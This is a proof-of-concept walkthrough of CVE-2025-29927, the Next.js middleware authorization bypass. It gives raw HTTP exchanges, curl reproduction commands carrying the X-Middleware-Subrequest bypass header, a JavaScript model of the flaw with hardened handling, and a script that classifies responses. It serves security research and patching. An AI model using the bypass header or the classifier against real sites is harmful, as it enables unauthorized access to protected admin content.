
CVE-2025-29927: Middleware Vulnerability


CVE-2025-29927 is an authorization-bypass vulnerability in Next.js middleware: the runtime trusts an internal header that an external client can supply. The PoC shows that a specially crafted HTTP request bypasses the redirect logic and reaches restricted content, here an admin dashboard. This walkthrough is intended for educational and security-research purposes only.


Warning: This PoC is intended for use only in controlled environments with explicit permission. Unauthorized testing against systems you do not own, or have no consent to test, is illegal.


Prerequisites


To carry out this PoC you need:


  • A target server running a vulnerable setup (a Next.js application whose middleware enforces the redirect; the affected versions are listed in the CVE details).

  • An HTTP client such as curl (curl.se) or Burp Suite (portswigger.net/burp), or a custom script.

  • Basic knowledge of HTTP and its headers (see the MDN HTTP documentation).


Vulnerability overview


CVE-2025-29927 is a logic flaw in how Next.js middleware handles its internal X-Middleware-Subrequest header. Next.js sets this header on the subrequests it issues from middleware and, to avoid infinite recursion, skips running the middleware once the header shows it has already been invoked up to the recursion limit. Because the check trusts the header exactly as received, an external client can add it and have the middleware, together with any authentication or redirect logic inside it, skipped entirely. That is what the PoC shows: adding the header turns a 307 redirect into a 200 with the dashboard content. The flaw lives in Next.js itself, not in the reverse proxy; nginx here merely forwards the request, header included. The issue is fixed in Next.js 15.2.3, 14.2.25, 13.5.9 and 12.3.5, and where upgrading is not immediately possible the vendor's recommended mitigation is to strip the X-Middleware-Subrequest header from external requests at the proxy or edge before they reach the application.
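The following is an added example, not Next.js source code and not part of the original post: a simplified model of the recursion-depth check that makes the header dangerous, with the hardened handling beside it. The depth limit of 5, the middleware name `middleware`, the /dashboard and /login paths and the session cookie are all assumptions made for the demonstration.

```javascript
// Added example (not Next.js source): a simplified model of the middleware
// runner logic behind CVE-2025-29927, with the hardened handling beside it.

const INTERNAL_HEADER = 'x-middleware-subrequest';
const MAX_RECURSION_DEPTH = 5;        // assumed limit; mirrors the five repetitions in the PoC
const MIDDLEWARE_NAME = 'middleware'; // assumed name of the middleware file at the project root

// Normalise header names to lower case, the way Node's http module does.
function normalizeHeaders(headers) {
  const out = {};
  for (const [k, v] of Object.entries(headers || {})) out[k.toLowerCase()] = String(v);
  return out;
}

// The application's own middleware: unauthenticated requests to /dashboard go to /login.
function middleware(req) {
  if (req.path.startsWith('/dashboard') && !req.cookies?.session) {
    return { status: 307, headers: { location: '/login' } };
  }
  return null; // fall through to the route handler
}

// The route handler the middleware is supposed to guard.
function dashboardRoute() {
  return { status: 200, headers: { 'content-type': 'text/html; charset=utf-8' }, body: '<h1>Dashboard</h1>' };
}

// Vulnerable runner: trusts the header as received. If the header already lists the
// middleware MAX_RECURSION_DEPTH times, the runner assumes it is looping and skips it.
function vulnerableRunner(req) {
  const headers = normalizeHeaders(req.headers);
  const chain = (headers[INTERNAL_HEADER] || '').split(':');
  const depth = chain.filter((segment) => segment === MIDDLEWARE_NAME).length;
  if (depth >= MAX_RECURSION_DEPTH) return dashboardRoute(); // middleware skipped
  return middleware(req) || dashboardRoute();
}

// Hardened runner: the header is an internal signal, so whatever arrives from the
// outside is dropped before the recursion check sees it. This is the same effect as
// stripping the header at the reverse proxy, the vendor-recommended interim mitigation.
function hardenedRunner(req) {
  const headers = normalizeHeaders(req.headers);
  delete headers[INTERNAL_HEADER];
  return vulnerableRunner({ ...req, headers });
}

// Constructed requests mirroring the two steps of the PoC (no session cookie either time).
const baseline = { path: '/dashboard', headers: { host: 'abc.com' }, cookies: {} };
const bypass = {
  ...baseline,
  headers: {
    ...baseline.headers,
    'X-Middleware-Subrequest': 'middleware:middleware:middleware:middleware:middleware',
  },
};

function demo() {
  return {
    vulnerableBaseline: vulnerableRunner(baseline).status, // 307: middleware redirects
    vulnerableBypass: vulnerableRunner(bypass).status,     // 200: middleware skipped
    hardenedBypass: hardenedRunner(bypass).status,         // 307: header ignored
  };
}

console.log(demo());
```

The point of the model is the last two lines of `vulnerableRunner`: the decision to skip the middleware is driven entirely by a value the client controls. Note that header matching is case-insensitive, so normalising names before stripping matters; a proxy rule that only drops the exact spelling `X-Middleware-Subrequest` would miss `x-middleware-subrequest`.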


PoC steps


The PoC has two steps: an initial request that fails and a modified request that succeeds. Each step includes the HTTP request, the response and a detailed explanation.


Step 1: Initial request (fails)


This step shows the server's default behaviour when /dashboard is requested without any extra headers.


HTTP request


GET /dashboard HTTP/1.1
Host: abc.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

HTTP response


HTTP/1.1 307 Temporary Redirect
Server: nginx/1.14.1
Date: Sun, 23 Mar 2025 22:02:08 GMT
Connection: keep-alive

Request details:

- GET /dashboard: an attempt to reach the dashboard.

- Standard headers such as User-Agent and Accept: imitate an ordinary browser request.


Response details:

- 307 Temporary Redirect: the server redirects the client, most likely because of authentication or authorization logic in the middleware (for example, a redirect to the login page).

- Server: nginx/1.14.1: identifies the web server sitting in front of the application.


Analysis:

The redirect is the protection mechanism: the middleware intercepts direct access to /dashboard. The response shown carries no Location header (probably trimmed for brevity); a real 307 always includes one, and its value, typically the login page, is worth recording as the baseline to compare against in step 2.


Learn more about HTTP status codes on the MDN HTTP Status page.


Step 2: Modified request (succeeds)


This step adds the custom header to bypass the redirect and successfully retrieves the dashboard content.


HTTP request


GET /dashboard HTTP/1.1
Host: abc.com
X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

HTTP response


HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Sun, 23 Mar 2025 22:04:04 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Accept-Encoding
X-Powered-By: Next.js
Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
Content-Length: 30174

Request details:

  • X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware: the header added to the original request. Next.js uses it internally to mark subrequests issued from middleware and to stop infinite recursion; the repeated "middleware" segments are what its depth check counts, and once the count reaches the limit the middleware is skipped for this request.

  • The other headers remain unchanged from step 1.

Response details:

  • 200 OK: confirms successful access to the dashboard content.

  • Content-Type: text/html; charset=utf-8: an HTML response, presumably the dashboard page.

  • X-Powered-By: Next.js: the application runs on Next.js, a React framework that commonly enforces redirects and access control in middleware.

  • Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate: prevents caching, typical of dynamic, user-specific content.

  • Content-Length: 30174: the size of the response body in bytes, large enough to be a full page rather than an error stub.

Analysis:

The X-Middleware-Subrequest header makes the runtime treat the request as one of its own internal subrequests, so the middleware, and with it the redirect logic, never runs. The root cause is that an internal signal is read from a client-controllable header without any verification.

Learn more about Next.js middleware in the Next.js documentation.


How to reproduce it


To reproduce the PoC with curl, follow these steps:


Step 1: Send the initial request


curl -v "http://abc.com/dashboard" \
  -H "Host: abc.com" \
  -H "Accept-Language: en-US,en;q=0.9" \
  -H "Upgrade-Insecure-Requests: 1" \
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" \
  -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" \
  -H "Accept-Encoding: gzip, deflate, br" \
  -H "Connection: keep-alive"

Expected result: a 307 Temporary Redirect response. With -v, curl also prints the Location header, which tells you where the middleware sends unauthenticated clients.


Step 2: Send the modified request


curl -v "http://abc.com/dashboard" \
  -H "Host: abc.com" \
  -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware" \
  -H "Accept-Language: en-US,en;q=0.9" \
  -H "Upgrade-Insecure-Requests: 1" \
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" \
  -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" \
  -H "Accept-Encoding: gzip, deflate, br" \
  -H "Connection: keep-alive"

Expected result: 200 OK with the dashboard content. Because the request advertises Accept-Encoding: gzip, deflate, br, the body curl prints may be compressed; add --compressed (or drop that header) to read it. Interpret the pair of results together: if both steps return 200, the route is not guarded by middleware and the test proves nothing; if both return 307, the target is patched, the header is stripped upstream, or the middleware is registered under a different name than the one repeated in the header value.


Note: when testing in an authorized environment, replace abc.com with the actual target's domain.
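As an added example, not part of the original post, the following script encodes the decision a tester makes after running the two curl commands: it parses the raw responses and returns a verdict, including the inconclusive cases. The two sample responses are the ones shown on this page, embedded as constructed inputs; the verdict names and the set of redirect codes are my own choices.

```javascript
// Added example (not from the original post): turn the two PoC responses into a verdict.

const REDIRECT_CODES = new Set([301, 302, 303, 307, 308]);

// Minimal parser for the head of a raw HTTP/1.x response: status code plus
// lower-cased header names. Anything after the first blank line (the body) is ignored.
function parseResponse(raw) {
  const head = raw.split(/\r?\n\r?\n/)[0];
  const lines = head.split(/\r?\n/);
  const m = /^HTTP\/\d\.\d (\d{3})/.exec(lines[0]);
  if (!m) throw new Error('not an HTTP response: ' + lines[0]);
  const headers = {};
  for (const line of lines.slice(1)) {
    const idx = line.indexOf(':');
    if (idx > 0) headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  return { status: Number(m[1]), headers };
}

// Verdict rules (assumed for this example):
//   baseline redirects, modified request gets 200   -> "vulnerable"
//   baseline redirects, modified request redirects  -> "not-vulnerable"
//   baseline does not redirect                      -> "inconclusive" (route is not guarded)
//   anything else                                   -> "inconclusive"
function classify(baselineRaw, modifiedRaw) {
  const base = parseResponse(baselineRaw);
  const mod = parseResponse(modifiedRaw);
  const poweredBy = mod.headers['x-powered-by'] || base.headers['x-powered-by'] || '';
  const result = {
    baselineStatus: base.status,
    modifiedStatus: mod.status,
    nextjs: /next\.js/i.test(poweredBy), // fingerprint only; absence proves nothing
    verdict: 'inconclusive',
    reason: '',
  };
  if (!REDIRECT_CODES.has(base.status)) {
    result.reason = 'baseline request was not redirected, so this route is not guarded by middleware';
  } else if (mod.status === 200) {
    result.verdict = 'vulnerable';
    result.reason = 'redirect without the header, 200 with it';
  } else if (REDIRECT_CODES.has(mod.status)) {
    result.verdict = 'not-vulnerable';
    result.reason = 'header did not change the redirect (patched, header stripped upstream, or different middleware name)';
  } else {
    result.reason = `unexpected status ${mod.status} with the header`;
  }
  return result;
}

// Constructed samples: the two response heads shown earlier on this page.
const BASELINE = [
  'HTTP/1.1 307 Temporary Redirect',
  'Server: nginx/1.14.1',
  'Date: Sun, 23 Mar 2025 22:02:08 GMT',
  'Connection: keep-alive',
  '',
  '',
].join('\r\n');

const MODIFIED = [
  'HTTP/1.1 200 OK',
  'Server: nginx/1.14.1',
  'Date: Sun, 23 Mar 2025 22:04:04 GMT',
  'Content-Type: text/html; charset=utf-8',
  'Connection: keep-alive',
  'Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Accept-Encoding',
  'X-Powered-By: Next.js',
  'Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate',
  'Content-Length: 30174',
  '',
  '<html>...</html>', // placeholder body, constructed
].join('\r\n');

console.log(classify(BASELINE, MODIFIED));
```

Feed it the raw output of `curl -i` (or the response pane from Burp) for each step. The inconclusive branches are deliberate: a 200 on both requests is the most common false positive when scanning many hosts, because it usually means the path was never protected in the first place.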
